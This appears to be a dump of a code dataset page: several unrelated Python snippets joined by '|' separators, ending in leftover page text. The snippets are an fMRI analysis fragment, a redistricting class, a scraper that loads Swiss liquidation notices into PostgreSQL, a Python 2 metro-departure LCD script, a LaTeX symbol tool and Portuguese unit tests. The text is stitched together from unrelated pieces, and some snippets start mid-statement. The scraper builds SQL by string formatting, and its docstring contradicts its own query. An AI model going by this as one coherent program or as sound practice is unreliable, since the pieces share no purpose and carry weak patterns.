Pvals_path, Tvals_path, coeff_vals_path = applyGLM(subject_list = autistic_list,score_list=df_aut_score,mask_path=mask_path,save_destination= save_destination,\
num_proc = num_proc)
print('Now doing FDR Correctiona and Visualization')
brain_path = autistic_list_nii[0] # getting a header to be used later to save brain files
brain_data = nib.load(brain_path)
affine=brain_data.affine
header = brain_data.header
Pvals_path = opj(save_destination,'Pvals.npy')
Tvals_path = opj(save_destination,'Tvals.npy')
coeff_vals_path = opj(save_destination,'coeff_vals.npy')
fdr_correction_and_viz(Pvals_path, Tvals_path, coeff_vals_path, mask_path, save_destination, affine, header, combination )
# Created above a prarallel proc pipeline that loops over all the brain voxels inside the mask and
# Create another list of corr values spanning all the subjects
# Extract FIQ values of the same subjects
# Use statmodels to caculate the fit of the line and t vals and p vals
|
class Tract:
def __init__(self, tract):
self.id = tract.id
self.center = tract.center
self.population = tract.population
def initialize_assignment(self):
self.prior_assignment = None
self.new_assignment = None
def assign_district(self, district):
self.prior_assignment = self.new_assignment
self.new_assignment = district
def reassign_district(self, district):
self.new_assignment = district
|
from PyPDF2 import PdfFileReader
import requests
import os
import psycopg2
import datetime
from passwords1 import psql_user, psql_pw, psql_host, psql_port, psql_database
def liq_all_cantons():
""" Opens the current SHAB pdf and splits the content into entries for each Liquidationsschuldenruf. Then calls save_to_db with these entries. """
pdf_path = "aktuelle_ausgabe.pdf"
r = requests.get("https://www.shab.ch/api/v1/archive/issue-of-today?tenant=shab&language=de")
with open(pdf_path, "wb") as f:
f.write(r.content)
pdf = PdfFileReader(pdf_path)
page_content = ""
i = 1
while i < pdf.getNumPages():
page_content = page_content + pdf.getPage(i).extractText()
i += 1
try:
page_splitted = page_content[page_content.index("Liquidationsschuldenrufe"):page_content.index("Weitere gesellschaftsrechtliche Schuldenrufe")]
except:
page_splitted = page_content[page_content.index("Liquidationsschuldenrufe"):page_content.index("Schuldbetreibungen")]
page_splitted = page_splitted[1:]
content_list = []
while True:
try:
x, y = split_content(page_splitted)
content_list.append("L"+x)
page_splitted = y[1:]
except:
try:
x = page_splitted
content_list.append("L"+x)
break
except:
break
os.remove(pdf_path)
save_to_db(content_list)
def split_content(page_splitted):
""" Helper function for the function liq_all_cantons() to split before and after the term Liquidationsschuldenruf. """
content_splitted = page_splitted[:page_splitted.index("Liquidationsschuldenruf")]
page_splitted = page_splitted[page_splitted.index("Liquidationsschuldenruf"):]
return content_splitted, page_splitted
def save_to_db(x):
""" Uses the entries from liq_all_cantons() to create all values and insert them in the psql table. """
if(len(x) == 0):
print("save_to_db:: received list was empty")
return
i = 0
VALUES = None
j = 0
print(len(x))
while VALUES == None and i < len(x):
print(j)
j+= 1
VALUES = create_values_command(x[i])
i += 1
if(i == len(x)):
print("save_to_db:: no elements found with non null names")
return
for k in x[i:]:
print(str(j)+"*")
j+= 1
value = create_values_command(k)
if value != None:
VALUES += ", " + value
query_no_fetch("INSERT INTO liquidations VALUES {} ON CONFLICT (name) DO UPDATE SET type=EXCLUDED.type, name=EXCLUDED.name, che=EXCLUDED.che, date=EXCLUDED.date, contact=EXCLUDED.contact, insertdate=EXCLUDED.insertdate;".format(VALUES))
def create_values_command(i):
""" Helper function for save_to_db to search for the defined values in the entries from liq_allcantons. """
a,b,c,d,e = None, None, None, None, None
try:
a = i[i.index("Veröffentlichung") -3 : i.index("Veröffentlichung") + 16]
except:
pass
try:
b = i[i.index("Liquidationsschuldenruf") + 24 : i.index("Aufgelöstes Unternehmen") - 21]
except:
return None
try:
c = i[i.index("CHE-") : i.index("CHE-") + 15]
except:
pass
if c == None:
try:
r = requests.post("https://www.zefix.ch/ZefixREST/api/v1/firm/search.json", json={"name":b ,"languageKey":"de", "maxEntries":1})
x = r.json()["list"][0]["uid"]
c = x[0:3] + "-" + x[3:6] + "." + x[6:9] + "." + x[9:12]
except Exception as e:
print(str(e))
pass
try:
d = datetime.datetime.strptime(i[i.index("Ablauf der Frist") + 18: i.index("Ablauf der Frist") + 28], "%d.%m.%Y")
except Exception as e:
print(str(e))
pass
try:
e = i[i.index("Kontaktstelle") + 15 : ]
except:
pass
try:
e = e[ : e.index("Bemerkungen") - 1]
except:
pass
try:
e = e[ : e.index("Hinweise zur Rechtsgültigkeit") - 1]
except:
pass
if d == None:
if a == "3. Veröffentlichung":
date = datetime.datetime.now() + datetime.timedelta(30)
return "({}, {}, {}, '{}', {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), date.strftime('%Y-%m-%d'), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
return "({}, {}, {}, null, {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
else:
return "({}, {}, {}, '{}', {}, '{}')".format(make_safe(a), make_safe(b), make_safe(c), d.strftime('%Y-%m-%d'), make_safe(e), datetime.datetime.now().strftime('%Y-%m-%d'))
def make_safe(s):
""" Helper function to create safe psql strings."""
if s == None:
return "null"
return "'" + s.replace("'", "''") + "'"
def get_psql_connection():
return psycopg2.connect(
user = psql_user,
password = psql_pw,
host = psql_host,
port = psql_port,
database = psql_database
)
def query(cmd):
return _query(cmd, True)
def query_no_fetch(cmd):
_query(cmd, False)
def _query(cmd, fetch):
connection = get_psql_connection()
cursor = connection.cursor()
cursor.execute(cmd)
connection.commit()
if(fetch):
res = cursor.fetchall()
cursor.close()
connection.close()
return res
cursor.close()
connection.close()
return
def delete_liquidations():
""" Delete all entries in liquidations 7 days after the deadline. """
query_no_fetch("DELETE FROM liquidations WHERE date < current_date - interval '30 days'")
liq_all_cantons()
delete_liquidations()
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import time
from datetime import datetime
from pylcdsysinfo import BackgroundColours, TextColours, TextAlignment, TextLines, LCDSysInfo
from collections import deque
from time import sleep
from os import stat
import re
from suds.client import suds
from suds.client import Client
class SLAPI(object):
def __init__(self, uri):
self.client = Client(uri)
def get_departures(self, station):
ret = []
for metro in self.client.service.GetDepartures(station).Metros.Metro:
# print metro
if metro.DisplayRow1 is None:
ret.append(" No Update ")
else:
ret.append(re.sub(' +', ' ', unicode(re.sub('11 (A|K)', '\\1', metro.DisplayRow1) + " ")))
if metro.DisplayRow2 is None:
ret.append(" No Update ")
else:
ret.append(re.sub(' +', ' ', unicode(re.sub('11 (A|K)', '\\1', metro.DisplayRow2) + " ")))
return ret
d = LCDSysInfo()
d.clear_lines(TextLines.ALL, BackgroundColours.BLACK)
d.dim_when_idle(False)
d.set_brightness(127)
d.save_brightness(127, 255)
d.set_text_background_colour(BackgroundColours.BLACK)
try:
api = SLAPI('http://www1.sl.se/realtidws/RealTimeService.asmx?wsdl')
last_check = 0
r = re.compile(r'([^ ]+ ([0-9]{2}:[0-9]{2}|[0-9]{1,2} min))')
while(True):
c = api.get_departures(9301)
m = re.match(r, c[1])
if m:
s1 = m.group(0)
else:
s1 = c[1]
m = re.match(r, c[3])
if m:
s2 = m.group(0)
else:
s2 = c[3]
f = open('yw', 'r')
yw = f.read()
f.close()
d.display_text_on_line(1, c[0], False, TextAlignment.LEFT, TextColours.ORANGE)
d.display_text_on_line(2, s1, False, TextAlignment.LEFT, TextColours.ORANGE)
d.display_text_on_line(3, c[2], False, TextAlignment.LEFT, TextColours.ORANGE)
d.display_text_on_line(4, s2, False, TextAlignment.LEFT, TextColours.ORANGE)
d.display_text_on_line(6, yw, False, TextAlignment.CENTRE, TextColours.CYAN)
sleep(15)
except KeyboardInterrupt:
exit()
|
from . import OtherLine, ParsingError, SymbolSection, Symbol, parse_all_symbols
from optparse import OptionParser
import sys
def main():
parser = OptionParser()
parser.add_option("--select", help="Select by tag")
parser.add_option("--color", help="Use this color", default=None)
parser.add_option("--markfirst", help="Mark first command",
default=False, action='store_true')
(options, args) = parser.parse_args() #@UnusedVariable
if options.markfirst:
sys.stdout.write("""
%\\newcommand{\\markfirst}[3]{#3}
""")
out = sys.stdout
def comment(el, s):
s = s.replace('\n', ' ')
out.write('%% %s: %s\n' % (el.symbol, s))
for el in parse_all_symbols(args):
if isinstance(el, OtherLine):
sys.stdout.write(el.line)
sys.stdout.write('\n')
elif isinstance(el, Symbol):
if options.select is not None:
if not options.select in el.other:
comment(el, 'Skipped because no field %r' % options.select)
continue
filters = []
if options.color:
if el.nargs == 0:
def highlight(x):
return "{\\color{%s} %s}" % (options.color, x)
filters.append(highlight)
# if options.deprecated:
# if 'deprecated' in el.other and el.nargs == 0:
# def mark_deprecated(x):
# return "{\\color[rgb]{1,0,0} %s}" % x
# filters.append(highlight)
if options.markfirst:
if el.nargs == 0:
boolname = 'used%s' % str(el.symbol[1:])
def mark_first(x):
return ("\\markfirst{%s}{%s}{%s}" %
(el.symbol[1:], boolname, x))
filters.append(mark_first)
sys.stdout.write('\\newbool{%s}\\setbool{%s}{false}\n'
% (boolname, boolname))
def wrapper(x):
for f in filters:
x = f(x)
return x
sys.stdout.write(el.tex_definition(wrapper=wrapper))
sys.stdout.write('\n')
elif isinstance(el, SymbolSection):
pass
else:
raise ParsingError('Unknown element: {0}'.format(el), el.where)
assert False
if __name__ == '__main__':
main()
|
from unittest import TestCase
from testes_unitarios.arquivo import soma, potenciacao, subtracao, todas_as_poltronas_estao_vendidas
class TesteCoisasDeMatematica(TestCase):
def test_soma_basica_de_dois_numeros_positivos(self):
self.assertEqual(0, soma(0, 0))
self.assertEqual(2, soma(1, 1))
self.assertEqual(4, soma(2, 2))
def test_soma_basica_de_dois_numeros_negativos(self):
self.assertEqual(-2, soma(-1, -1))
self.assertEqual(-4, soma(-2, -2))
def test_potenciacao(self):
self.assertEqual(4, potenciacao(2, 2))
self.assertEqual(1, potenciacao(1, 1))
self.assertEqual(1, potenciacao(1, 0))
def test_potenciacao_potencia_um(self):
self.assertEqual(1, potenciacao(1, 1))
self.assertEqual(5, potenciacao(5, 1))
def test_subtracao(self):
self.assertEqual(3, subtracao(5, 2))
self.assertEqual(0, subtracao(1, 1))
class TesteCoisasDePassagemDeOnibus(TestCase):
def test_retorna_falso_quando_nenhuma_poltrona_vendida(self):
poltronas = ['', '', '']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertFalse(resultado)
def test_retorna_falso_quando_apenas_uma_poltrona_vendida(self):
poltronas = ['', '', 'X']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertFalse(resultado)
def test_retorna_falso_quando_duas_poltronas_vendidas(self):
poltronas = ['X', '', 'X']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertFalse(resultado)
def test_retorna_true_quando_todas_poltronas_vendidas(self):
poltronas = ['X', 'X', 'X']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertTrue(resultado)
def test_retorna_true_quando_tem_poltrona_Y(self):
poltronas = ['', '', 'Y']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertTrue(resultado)
def test_retorna_true_quando_tem_varias_x_e_uma__Y(self):
poltronas = ['X', 'X', 'Y']
resultado = todas_as_poltronas_estao_vendidas(poltronas)
self.assertTrue(resultado)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.